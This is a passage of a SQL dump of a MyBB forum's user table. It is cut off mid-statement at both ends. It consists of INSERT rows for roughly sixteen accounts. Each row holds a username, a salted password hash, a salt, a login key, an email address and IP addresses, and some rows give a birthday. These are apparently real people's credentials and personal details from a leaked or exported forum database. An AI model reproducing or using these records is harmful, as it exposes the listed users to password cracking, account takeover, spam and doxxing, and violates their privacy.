`invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('168', 'indichi', 'b6f0d4d0b13e224d4e94d15fc2923345', 'TJGF4Yzs', 'BH4FyAyUVHn68S23eqXCbiV9hSwuREVwWu1beiu5vKDGYsJBVz', 'indigo_child2012@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346757136', '1346853572', '1346834740', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '178.239.48.14', '178.239.48.14', '-1292947442', '-1292947442', '', '2201', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('169', 'hackkanji12', '0b1921537bf281c3061e52c2c0930b6c', 'vP4x81Ig', 'i2TJAic6x5dVdfvXmr1rOaRVjiq3jFMC61wfJbNWkIEP5KPwXi', 'hackkanji@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346759648', '1346759648', '1346759648', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '41.218.228.22', '', '702211094', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('171', 'W33D', '154cde4b9f8616e38a10194cec0f69e6', 'eucYfit9', 'WZs7bnK2gjjcUyFQ2dx4MHUa7jvOO3ysvwpZf1eVr6nGawFyn9', 'graalwanabe123@hotmail.com', '4', 'http://www.ubers.org/uploads/avatars/avatar_51071.gif?dateline=1345030849?dateline=1346767654', '85|85', 'remote', '2', '', '0', '', '1346767282', '1346873495', '1346806276', '1346806276', '', '0', '', '', '', '', 'all', '[align=center][img]http://img27.imageshack.us/img27/2654/lhfb.png[/img][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '67.68.224.95', '67.68.224.95', '1128587359', '1128587359', '', '2990', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '1', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('172', 'MistaCode', '72028da06203ad0e221f802a1d836261', 'aiPItlq9', 'rkBG8WKLht4Pfkmc7QfXXOcqjlMHfLzEq4ISojezZzEiojEkhl', 'korhaleksi@gmail.com', '32', '', '', '', '2', '', '0', '', '1346774332', '1352143918', '1350220357', '1350060722', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '2', '46.165.208.13', '88.193.83.195', '782618637', '1489064899', '', '17345', '1', '4', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '12', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('173', 'Dezinated', 'a5751bf5315945dfbc8b5427694a7f55', 'GVRgsaJ7', 'ourcnhOCk18zcIIhC1wBhYnJwxyPb4qA7B75kUBc5PoJH9Mild', 'dezinated@gmail.com', '0', '', '', '', '2', '', '0', '', '1346803206', '1346803209', '1346803206', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '99.228.31.50', '99.228.31.50', '1675894578', '1675894578', '', '3', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('174', 'a-monetmir', '32ecdc8839a43b01be15281799b17daf', '1x9J4qHp', '8QFeFiE38XqYHX3LeDUBGGS1N7ox1yjr45JgvHhEgKUKchdbOC', 'a.nedmir@gmail.com', '0', '', '', '', '2', '', '0', '', '1346835586', '1346838524', '1346835586', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '65.49.68.185', '65.49.68.185', '1093747897', '1093747897', 'english', '605', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('234', 'SamuelNguyen', 'ddfe4ea0aae3aea9d52c6b3b0d15dc04', 'Czo33lgv', 'eNrlBc8nzkRINyqlkLi73pWzc99jG6q4w1Aqn7iy6UBoXWdCi4', 'samuelnnguyen@hotmail.com', '2', '', '', '', '2', '', '0', '', '1349655280', '1349663649', '1349659674', '1349655945', '', '0', '', '', '', '5-4-1980', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '95.140.125.125', '174.60.173.69', '1603042685', '-1371755195', '', '956', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('177', 'morbidx', '13080bd7287896dd80653a786fd3f43f', 'lXPzfjbE', 'Kfl5mDHQFpg1yWZ46V8uWOojTrOdPvr8n7PHINDhlVJP2tBZrZ', 'domesticatepronged@noclickemail.com', '0', '', '', '', '7', '', '0', '', '1346873134', '1346879433', '1346879433', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '217.114.211.243', '95.141.28.55', '-646786061', '1603083319', '', '3628', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('176', 'someone4ever190', '4969a1388c2a8c35933cb76f7b0f867a', 'TNbGVRf8', '9bYlMZy4tPaVff5Qnuxzox9roMTQVUUjKYNjKj39lmmzK9ndzQ', 'someone4ever190@yahoo.com', '0', '', '', '', '7', '', '0', '', '1346863254', '1346863254', '1346863254', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '184.171.165.71', '', '-1196710585', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('178', 'The Host', 'bc6da019ba74b0cfb03d44a6aa53b100', 'fgitOVy5', 'yfnWbnFrf432PUSa6NhgozNKzh8XCOWQYLM2fUI6QV4N4PX2TR', 'linkworld@live.com', '1', '', '', '', '14', '', '0', '', '1346965873', '1346968848', '1346965873', '1346966395', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '94.13.132.145', '94.13.132.145', '1577944209', '1577944209', '', '2975', '1', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '2', '0', '', '', 'b:0;', '1', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('179', 'ryuzaki', '9f73ebf3331d0f0edbd6585f36020eab', '9eukDJeu', 'uEMd38J23TZcsIKWAsDkrDfOKMY3BL6Wnok8NcPlIRkkJOZEk5', 'alexito_p1@live.com.mx', '0', '', '', '', '7', '', '0', '', '1346983817', '1346983817', '1346983817', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '189.221.180.145', '', '-1109543791', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('180', 'ThatUselessMan', '0a6ef1fe118e919f969efbf30f04c9d9', 'Xf45YXtA', '6w72OSQ3LVuv9TmZjJDQXBsxj2LSQep72mNkEN9iy3hEXboUrM', 'thatuselessman@gmail.com', '0', '', '', '', '2', '', '0', '', '1347123373', '1347123679', '1347123373', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '77.86.33.102', '77.86.33.102', '1297490278', '1297490278', '', '306', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('181', 'Sotark', '2738617f0d81cf8b4be6606419f91b11', 'fRtMlhq9', 'QNArsh7vQp8QF5P3eZHsLr5cEsJXUmOCC7cgiSuVjGqTZ13XJv', 'sotarkhf@hotmail.com', '0', '', '', '', '2', '', '0', '', '1347135400', '1347135400', '1347135400', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-10', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '1', '0', '0', '70.95.105.70', '', '1180657990', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('182', 'jrmn', 'fa64bd7f75891af04a039e777202c52e', 'QCBw4mOt', 'aoiiC2B5WIrBDGP6MuHYhqgZDSxc2k4xFXETZ5uIQJa9KWZ65k', 'jarkolatal@centrum.sk', '0', '', '', '', '2', '', '0', '', '1347177832', '1348909682', '1347218452', '0', '', '0', '', '', '', '14-12-1980', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '0', '87.197.102.229', '195.91.108.175', '1472554725', '-1017418577', '', '1424', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('183', 'toxicsn0w', '210fe9bcb56dc81ba39c5e035b083c74', 'iKxNKQE5', 'wWGMwOA1RHr3kGxS4EWiqCk3i5fs9MsiOxb1DJlHVuUtwuMHKQ', 'haroon.bc@gmail.com', '1', '', '', '', '2', '', '0', '', '1347362580', '1347362808', '1347362580', '1347362726', '', '0', '', '', '', '1-1-1988', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '69.119.94.188', '69.119.94.188', '1165450940', '1165450940', '', '228', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, 